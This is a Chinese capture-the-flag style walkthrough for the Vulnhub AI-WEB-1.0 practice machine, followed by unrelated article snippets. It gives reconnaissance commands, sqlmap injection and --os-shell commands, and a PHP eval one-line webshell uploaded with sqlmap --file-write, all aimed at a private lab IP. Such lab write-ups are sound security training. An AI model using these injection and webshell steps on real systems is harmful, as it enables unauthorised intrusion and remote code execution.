Vulnhub - AI-WEB-1.0靶机教程

news2024/12/24 8:17:46

目录

站点信息收集

c段扫描

端口扫描

目录扫描

漏洞利用

使用 burp 抓包

查询数据库名

查询数据库下的表

查询表中的字段名

查询字段中的数据

--os-shell

上传一句话木马


下载地址:https://download.vulnhub.com/aiweb/AI-Web-1.0.7z

我们从站点信息收集开始,到漏洞攻击,再通过多方法拿到shell,提权benw。

我们使用kali进行攻击,靶机是AI WEB 1.0

kali的IP:192.168.202.128(终端窗口输 ifconfig)

WEBAI1.0的IP:未知

站点信息收集

注意:要在root管理员权限下进行

c段扫描

使用arp-scan扫描

-l (扫描c段)

arp-scan -l

在这里我们可以分析靶机的IP是192.168.202.147

端口扫描

使用 nmap 扫描

nmap 192.168.202.147 -sT -v -T4

只发现了80端口

目录扫描

先访问一下网页

发现什么也没有

使用 dirsearch 扫描

dirsearch -u http://192.168.202.147/

尝试访问 robots.txt 里的内容

访问 /m3diNf0/ 发现不能正常访问

访问 /se3reTdir777/uploads/ ,发现无权限(这里出现了一点小错误,按理说应该是放回页面,可以用来后面获得shell之后上传一句话木马,非常抱歉,因为我也是刚开始渗透测试方向的学习,技术不是很成熟,等我解决了之后再回来修改、补充文章,不过放心,不影响后面获得shell的操作)

接着对 /m3diNf0/ 和 /se3reTdir777/uploads/ 进行扫描

dirsearch -u http://192.168.202.147/m3diNf0/

/se3reTdir777/uploads/没发现,在/m3diNf0/发现了info.php,访问info.php

http://192.168.202.147/m3diNf0/info.php

发现是phpinfo的页面

再扫描se3reTdir777

dirsearch什么也没扫出来,换dirb扫描

dirb "http://192.168.202.147/se3reTdir777/"

发现了一个 index.php ,访问它

http://192.168.202.147/se3reTdir777/index.php

发现是一个信息查询的页面,尝试sql注入,输入 1’

页面报错,存在sql注入漏洞

漏洞利用

使用 burp 抓包

POST /se3reTdir777/index.php HTTP/1.1
Host: 192.168.202.147
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.202.147
Connection: close
Referer: http://192.168.202.147/se3reTdir777/index.php
Upgrade-Insecure-Requests: 1

uid=1%27&Operation=Submit

这是抓到的包,注入点是uid=1%27&Operation=Submit

查询数据库名

使用sqlmap 注入

sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --dbs

发现了两个数据库:aiweb1 、 information_schema,以及数据库的版本大于5.6的信息

查询数据库下的表

-D 数据库名

sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 --tables

得到了两个表名: user 、systemUser ,再通过-T 查询表中的字段名

查询表中的字段名

-T 表名

sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user --columns

得到了3个字段 : firstName、 id、 lastName

查询字段中的数据

-C 字段名

sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" -D aiweb1 -T user -C id --dump

没有什么有用信息

--os-shell

level 指定数据库类型为mysql,级别为3

--os-shell执行条件:

  • 网站必须是root权限
  • 必须知道网站的绝对路径
  • secure_file_priv无限制
sqlmap -u  "http://192.168.202.147/se3reTdir777/index.php" -data "uid=1%27&Operation=Submit" --level=3 --os-shell

这里选4 PHP

这里选2输入绝对路径

已经知道m3diNf0和se3reTdir777 两个目录,然后找绝对目录,返回刚才的info.php页面,按 CTRL + f,搜索 m3diNf0和se3reTdir777 这两个目录,se3reTdir777没发现,m3diNf0 如下图所示

由此可以得到绝对路径是: /home/www/html/web1x443290o2sdf92213/

还记得刚才我们找到一个可以上传文件的页面se3reTdir777/uploads/刚好符合 它的绝对目录为:

/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/

 到这里我们就获得了对方的shell,已经算攻击靶机成功了

上传一句话木马进而提权

先用 vim 编辑模式写一个一句话木马

vim 1.php

 进入 vim 编辑器后,按“i”键进入插入模式,输入

<?php @eval($_POST['1'])?>

 按“Esc”键退出插入模式,依次输入"  :wq  " 保存并退出 vim 编辑器

–file-write:去读取木马文件
–file-dest:后面加要存放文件的地址

sqlmap -u "http://192.168.202.147/se3reTdir777/index.php" --data "uid=1%27&Operation=Submit" --file-write "/home/kali/1.php" --file-dest "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/1.php"

如果你们 dir 之后可以看到 一句话木马 1.php的话,就表示写入文件成功了。

这里我没有成功,就不继续了,因为我也是刚开始渗透测试方向的学习,技术不是很成熟,等我解决之后再回来,非常抱歉,感谢大家支持。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1709837.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

2024年区块链,物联网与信息技术国际会议(ICBITIT 2024)

2024年区块链&#xff0c;物联网与信息技术国际会议&#xff08;ICBITIT 2024&#xff09; 2024 International Conference on Blockchain, Internet of Things, and Information Technology 会议简介&#xff1a; 2024年区块链&#xff0c;物联网与信息技术国际会议&#xff…

【调试笔记-20240528-Linux-用 OpenWrt-23.05 SDK 编译 frp 软件包】

调试笔记-系列文章目录 调试笔记-20240528-Linux-用 OpenWrt-23.05 SDK 编译 frp 软件包 文章目录 调试笔记-系列文章目录调试笔记-20240528-Linux-用 OpenWrt-23.05 SDK 编译 frp 软件包 前言一、调试环境操作系统&#xff1a;Ubuntu 22.04.4 LTS编译环境调试目标 二、调试步…

java函数编程-黑马学习笔记

第一章 01合格的函数 函数就是一个规则 合格的函数就是只要你输入相同&#xff0c;无论多少次调用&#xff0c;不论什么时间调用&#xff0c;输出是相同的。 函数可以引用外部的数据&#xff0c;但是需要去保证外部的数据不可变 static关键字修饰的静态方法本质上和函数没…

TCP 与 UDP

0. tcp 与 udp 的 异同特性 TCPUDPname传输控制协议用户数据报协议面向连接&#xff1f; 需要 传输数据前建立连接传输完毕后断开连接不需要可靠的传输数据&#xff1f; 可靠 有确认机制&#xff08;三次握手&#xff09; 有确认、窗口、重传、拥塞控制的机制保证数据可靠传输…

10Django项目--用户管理系统--改

对应视频链接点击直达 10Django项目--用户管理系统--改 对应视频链接点击直达改a&#xff0c;本质b&#xff0c;修改(更新) 页面相关a&#xff0c;index页面新增操作按钮b&#xff0c;修改(更新)页面c&#xff0c;路由和函数 OVER&#xff0c;不会有人不会吧不会的加Q139400651…

项目9-网页聊天室3(主界面之用户信息)

1.前端页面 CSS: 如何让img里的图片自适应div&#xff0c;且不变形_img自适应div大小 铺满且不变形-CSDN博客 JavaScript/jQuery 如何改变一个img元素的src属性|极客教程 (geek-docs.com) 2.要求 左上角显示用户的昵称和头像. 3.后端代码 3.1 添加拦截器 3.2 注册拦截器 …

深入解析MySQL 8中的角色与用户管理

欢迎来到我的博客&#xff0c;代码的世界里&#xff0c;每一行都是一个故事 &#x1f38f;&#xff1a;你只管努力&#xff0c;剩下的交给时间 &#x1f3e0; &#xff1a;小破站 深入解析MySQL 8中的角色与用户管理 前言角色和用户的基础概念用户&#xff08;User&#xff09;…

收银系统源码--零售连锁店铺如何选择适合自己的收银系统?

如果你现在还认为小便利店只要简单的收款&#xff0c;只有大型的连锁便利店才需要收银软件和管理软件&#xff0c;那你就错了&#xff0c;连锁品牌的便利店是必须要用到专业的收银软件&#xff0c;但是小微型的便利店更应该要用专门的软件&#xff0c; 在各行各业逐步革新互联网…

【ai】LiveKit Agent 的example及python本地开发模式工程实例

title: ‘LiveKit Agent Playground’ playgroundLiveKit Community playground的环境变量&#xff1a;LiveKit API # LiveKit API Configuration LIVEKIT_API_KEYYOUR_API_KEY LIVEKIT_API_SECRETYOUR_API_SECRET# Public configuration NEXT_PUBLIC_LIVEKIT_URLwss://YOUR_…

计算机网络基础 - 计算机网络和因特网(1)

计算机网络基础 计算机网络和因特网什么是 Internet?具体构造的的角度服务角度网络结构 网络边缘网络核心电路交换分组交换概述排队时延和分组丢失转发表和路由选择协议按照有无网络层的连接 分组交换 VS 电路交换 接入网DSL 因特网接入电缆因特网接入光纤到户 FTTH无线接入网…

十五、Python模块 1、(入门一定看!!!)「长期更新Python简单入门到适用」

首先什么是模块&#xff1f; 小伙伴们经常看我写的教程不难发现&#xff0c;前面我们用过几次模块就是sys的那个&#xff0c;其实python不仅标准库中包含了大量的模块&#xff08;也被称之为准模块&#xff09;&#xff0c;还有大量的第三方模块&#xff0c;开发者也可以自己发…

图卷积神经网络的简史 及其与卷积神经网络的异同

图卷积神经网络&#xff08;GCN&#xff09;已经在处理图结构数据方面取得了巨大的成功。在本小节中&#xff0c;我们将深入探讨图卷积神经网络的起源、发展历程&#xff0c;并提供一个简单的Python代码实现示例&#xff0c;以帮助读者更好地理解这一概念。 图卷积神经网络的简…

Echarts图表库推荐以及使用Echarts实现饼图端头弧形效果

推荐Echarts图表库官方链接http://www.ppchart.com/#/ 下面是一段实现饼图端头弧形效果的Echarts代码 下面代码可以直接新建html文件运行看效果也可以看我下面贴的效果图 <!DOCTYPE html> <html lang"en"> <head><meta charset"UTF-8&q…

【深度学习实战—8】:基于MediaPipe的人脸检测

✨博客主页&#xff1a;王乐予&#x1f388; ✨年轻人要&#xff1a;Living for the moment&#xff08;活在当下&#xff09;&#xff01;&#x1f4aa; &#x1f3c6;推荐专栏&#xff1a;【图像处理】【千锤百炼Python】【深度学习】【排序算法】 目录 &#x1f63a;一、Med…

专业渗透测试 Phpsploit-Framework(PSF)框架软件小白入门教程(八)

本系列课程&#xff0c;将重点讲解Phpsploit-Framework框架软件的基础使用&#xff01; 本文章仅提供学习&#xff0c;切勿将其用于不法手段&#xff01; 继续接上一篇文章内容&#xff0c;讲述如何进行Phpsploit-Framework软件的基础使用和二次开发。 现在&#xff0c;我们…

如何实现虚拟列表?定高和不定高两种场景

之前我写了一篇文章&#xff1a;如何使用 IntersectionObserver API 来实现数据的懒加载 在文章的最后&#xff0c;我们提到如果加载的列表数据越来越多&#xff0c;我们不可能把所有的数据都渲染出来&#xff0c;因为这样会导致页面卡住甚至崩溃。 为了优化这种长列表场景&am…

英伟达SSD视觉算法,jetson.inference在jetson nano中部署

一、用官方镜像刷机 安装SD卡擦除工具SD Card Formatter https://www.sdcardformatter.com/download/ 格式化SD卡 下载官方镜像 https://developer.nvidia.com/jetson-nano-sd-card-image 安装刷机工具balenaEtcher https://www.balena.io/etcher 将上面下载的镜像压缩包解…

[leetcode hot 150]第五十六题,合并区间

题目&#xff1a; 以数组 intervals 表示若干个区间的集合&#xff0c;其中单个区间为 intervals[i] [starti, endi] 。请你合并所有重叠的区间&#xff0c;并返回 一个不重叠的区间数组&#xff0c;该数组需恰好覆盖输入中的所有区间 。 思路&#xff1a; 这道题目要求合并一…

若依跳转(新增)页面,在菜单中不显示的页面

在router.js文件中 跳转方式 this.$router.push(/monitor/b/b)

Java面试八股之++操作符是线程安全的吗

操作符是线程安全的吗 操作符本身在Java中并不是线程安全的。这个操作实际上包含三个步骤&#xff1a;读取变量的值、将值加1、然后将新值写回内存。在多线程环境下&#xff0c;如果多个线程同时对同一个变量执行操作&#xff0c;就可能出现竞态条件&#xff08;race conditio…